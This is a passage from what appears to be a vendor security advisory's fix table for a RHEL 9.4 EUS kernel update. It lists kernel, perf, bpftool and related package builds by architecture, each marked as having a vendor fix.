| Unresolved product id: BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: BaseOS-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.src | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-debug-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-64k-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-abi-stablelists-0:5.14.0-427.114.1.el9_4.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debug-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debuginfo-common-aarch64-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debuginfo-common-ppc64le-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debuginfo-common-s390x-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-debuginfo-common-x86_64-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-devel-matched-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-doc-0:5.14.0-427.114.1.el9_4.noarch | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-kvm-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debug-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-kvm-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-modules-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-modules-core-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-rt-modules-extra-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-libs-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-tools-libs-devel-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-uki-virt-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-devel-matched-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-core-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:kernel-zfcpdump-modules-extra-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:libperf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:python3-perf-debuginfo-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rtla-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: CRB-9.4.0.Z.EUS:rv-0:5.14.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.s390x | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:bpftool-0:7.3.0-427.114.1.el9_4.x86_64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.aarch64 | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.ppc64le | — |
Vendor Fix
fix
|
|
| Unresolved product id: NFV-9.4.0.Z.EUS:bpftool-debuginfo-0:7.3.0-427.114.1.el9_4.s390x | — |
